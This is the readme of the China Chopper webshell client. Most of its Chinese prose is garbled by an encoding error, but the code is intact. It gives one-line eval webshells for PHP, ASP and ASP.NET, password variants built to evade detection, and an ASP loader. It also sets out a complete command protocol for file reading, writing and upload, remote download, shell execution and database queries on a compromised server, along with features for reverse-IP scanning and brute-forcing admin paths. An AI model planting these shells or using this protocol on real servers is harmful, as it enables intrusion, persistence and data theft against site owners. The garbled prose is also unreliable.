ƣй˵(China chopper)
ٷվhttp://www.maicaidao.com/
----------------------------------------------------------------------------------------------------------

	ʹעʹûعطɷ棡
	ʹòɵĺҲеκΣ
----------------------------------------------------------------------------------------------------------
ʹùиBUGһǷи°ɣ˵޲ء
----------------------------------------------------------------------------------------------------------

UINCODEʽ룬ֶ֧ʾ
ڷǼĻʹãԶӢĽ棬ĵطָ

һűͻ(EVAL)
1Ϣ
	EvalֻҪ򵥵һд룬ô˳ʵֳõĹܣܴαͣIDSߡ
	Ŀǰֵ֧ķ˽űPHP, ASP, ASP.NET֧httpsȫӵվ
	ڷеĴ£
	PHP:    <?php @eval($_POST['chopper']);?>
	ASP:    <%eval request("chopper")%>
	ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
		(ע: ASP.NETҪһļļҲJscriptű)
	Customize:	Զ,ܴڷ˱,֧ж̬ű,ֻҪȷ˵нɡ
		ģʽɰ趨ƣֻҪĿ¼ֻҪն˹ܣԺ̡ܼ

	ڱ仯, д
	Asp.NET:
	<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
	PHP:
	@eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);
	磺˵Ϊchopperǰַ,Ϊ{D}chopper

	
2
	ͼҼ/ӣڵĶԻ˵ַӵ(עеpassִ)ѡȷĽűͺԱ룬
	󼴿ʹļնˣݿдű鹦ܡ
	1. ļ[ɫ]Ŀ¼֧߲鿴Ŀ¼;
	2. նˣ[ɫ]Իƣ;(HELP鿴÷), ָΪ5kֽһݣֱύ
	3. ݿ[ɫ]ͼν,֧MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, Լ֧ADOʽӵݿ⡣
		ͨSQL﷨αػҪPHPMYADMINأң˵֧κνűݿء
		(ֽűµݿӷݿϽǴðť鿴)
   	4. дűͨ򵥱ύûԼĽűִУʵַḻĹܣҲѡ͵ִС
		ҪдԼCCCűԲοһCCCĿ¼µʾ, ҲдܷḻĽű
		ڹر˵CCCűĵ֮
	ע⣺ڷİȫãĳЩܿܲʹá

3)  Ϣд˵
	---------------------------------------------------------------------------------------
	A)  ݿⷽ棺
	-----------------------------------------------------------------------------
	PHPű
	<T></T> ͿΪMYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQLеһ
	<H>ַ<H> ַΪIPַlocalhost
	<U>ݿû</U> ݿûroot
	<P>ݿ</P> ݿ룬123455
	<N>ĬϿ</N> ĬӵĿ

	<L>utf8</L> һݿΪMYSQLűΪPHPʱѡΪlatin1

	ASPASP.NETű
	<T></T> ֻADO
	<C>ADOϢ</C>
	ADOӸݿķʽһMSSQLϢΪ
	Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
	ͬʱ֧NT֤¼MSSQLݿ⣬ܰѲѯĽбΪhtmlļ

	Customize ű
	<T></T> ֻXDB
	<X>Customize űԼϢ</X>
	˵ԴCustomize.jspݿд()
	MSSQL:
	<X>
	com.microsoft.sqlserver.jdbc.SQLServerDriver
	jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
	</X>
	MYSQL:
	<X>
	com.mysql.jdbc.Driver
	jdbc:mysql://localhost/test?user=root&password=123456
	</X>
	ORACLE:
	<X>
	oracle.jdbc.driver.OracleDriver
	jdbc:oracle:thin:user/password@127.0.0.1:1521/test
	</X>

	B) 棺
	-----------------------------------------------------------------------------
	Ӷ⸽ύݣASP·ģ
	<%
	Set o = Server.CreateObject("ScriptControl")
	o.language = "vbscript"
	o.addcode(Request("SC"))
	o.run "ff",Server,Response,Request,Application,Session,Error
	%>
	ô˵ô룺
	<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
	ȻpassӼɡ

	ύǰPOSTݰỰڼֻύһΡ
	<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
	<DATA>uid=user1&pwd=123456</DATA>

	Ĭն˳·ʾ
	<SHELL>/bin/sh</SHELL>

	նĬʾ
	<CMD>whoami</CMD>

	ļĬϴ򿪵Ŀ¼ʾ
	<CD>c:\windows\temp\</CD>

3)  HTTP¼֤
	SHELLַ http://user:pass@maicaidao.com/server.asp
	ûеַURLת

    4)  ݵ룺SHELLб棬Ҽһ˵԰Ĳ˵⵼뵽ǰС

ȫɨ
֩УѯĿ¼ơ
:
	A) 鵥һIPİ
	{reverse_ip} {url:http://www.maicaidao.com/}
	B) ɨ豾CοŵWEBѯ
	{reverse_ip_c} {url:http://www.maicaidao.com/}
	C) ֻɨ豾CοŵWEB
	{reverse_ip_c} {url:http://www.maicaidao.com/} {port}
	D) ֩
	{spider} {url:http://www.maicaidao.com/}
	E) ֩У趨зΧ
	{spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
	F) ֩УظURLӿٶ
	 {filter}
	G) ƹܣ%sΪdictеһ
		flag:Ϊص(HTTPͷ)еضؼ
		!!ΪؼΪTRUEؼΪTRUE
		list.txtΪǰĿ¼µļΪ·ע⣺Ҫ̫С
		ע20100626濪ʼlist.txtһҪUNICODEʽıļ
	{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
	{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
	{crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}

ʱ
	ð, ڣÿ/ÿ/ÿ/ֻһΡ

ġ
	һרõҳ:Post/ԶCookies,/ִԶű/Զˢҳ/ͬIPҳ
	ip.dat⣬״̬ʾվIP,Ҵ롣

塢
	ȴ롣



--------------------------------------------
20110628ע
ؽһ¡
--------------------------------------------


ļ˵
------------------------------------------------------------------
chopper.exe	˵
db.mdb		˵ݿ
------------------------------------------------------------------
cache.tmp	˵Ļݿ(ɾ)
readme.txt	ڿ(ɾ)
<CCC>		˵дű(ɾ)
<Customize>	Customizeģʽķ(ɾ)
	Customize.aspx	һC#ʾ(ȫ)
	Customize.jsp	һjspʾ(ȫ)
	Customize.cfm	һcfmʾ(ļն)



-------------------------------Customizeģʽ˵ͷͨŽӿ-----------------------------------------------------------------
----------------------------------Եķ˴ɰ˽ӿд(Customize.jsp/Customize.cfm)---------------------
˵ͻдΪpassҳѡGB2312(Jsp˻õ˲)
עвPOSTύصݶҪ->|Ϊʼǣ|<-Ϊ
עصĴϢͷERROR:// 
ע\tƱTAB\r\nлس\nس
עݿϢһַ˽űԶԴַʽԶ塣
-----------------------------------------------------------------------------------------------------------------------------------

[õǰĿ¼ľ·]
ύpass=A&z0=GB2312
أĿ¼ľ·\tWindowsϵͳżб
ʾc:\inetpub\wwwroot\	C:D:E:K:
ʾ/var/www/html/	

[Ŀ¼]
ύpass=B&z0=GB2312&z1=Ŀ¼·
أĿ¼ļ,Ŀ¼Ҫ/ļҪ/
ʾ
	Ŀ¼/\tʱ\tС\t\nĿ¼/\tʱ\tС\t\n
	ļ\tʱ\tС\t\nļ\tʱ\tС\t\n

[ȡıļ]
ύpass=C&z0=GB2312&z1=ļ·
أıļ

[дıļ]
ύpass=D&z0=GB2312&z1=ļ·&z2=ļ
أɹ1,ɹشϢ

[ɾļĿ¼]
ύpass=E&z0=GB2312&z1=ļĿ¼ľ·
أɹ1,ɹشϢ

[ļ]
ύpass=F&z0=GB2312&z1=ļľ·
أҪļ

[ϴļ]
ύpass=G&z0=GB2312&z1=ļϴľ·&z2=ļ(ʮıʽ)
أҪļ

[ļĿ¼ճ]
ύpass=H&z0=GB2312&z1=Ƶľ·&z2=ճľ·
أɹ1,ɹشϢ

[ļĿ¼]
ύpass=I&z0=GB2312&z1=ԭ(·)&z2=(·)
أɹ1,ɹشϢ

[½Ŀ¼]
ύpass=J&z0=GB2312&z1=Ŀ¼(·)
أɹ1,ɹشϢ

[޸ļĿ¼ʱ]
ύpass=K&z0=GB2312&z1=ļĿ¼ľ·&z2=ʱ(ʽyyyy-MM-dd HH:mm:ss)
أɹ1,ɹشϢ

[ļ]
ύpass=L&z0=GB2312&z1=URL·&z2=غ󱣴ľ·
أɹ1,ɹشϢ

[ִShell(Shell·ǰݷϵͳͼ-c/c)]
ύpass=M&z0=GB2312&z1=(-c/c)Shell·&z2=Shell
أִн

[õݿϢ]
ύpass=N&z0=GB2312&z1=ݿϢ
أɹݿ(Ʊ\tָ) ɹشϢ

[ȡݿ]
ύpass=O&z0=GB2312&z1=ݿϢ\r\nݿ
أɹݱ(\tָ) ɹشϢ

[ȡݱ]
ύpass=P&z0=GB2312&z1=ݿϢ\r\nݿ\r\nݱ
أɹ(Ʊ\tָ) ɹشϢ

[ִݿ]
ύpass=Q&z0=GB2312&z1=ݿϢ\r\nݿ&z2=SQL
أɹݱݣ ɹشϢ
ע⣺صĵһΪͷȥÿзֱбʾҪһ¡еÿк\t|\tǣÿԱ\r\nΪ

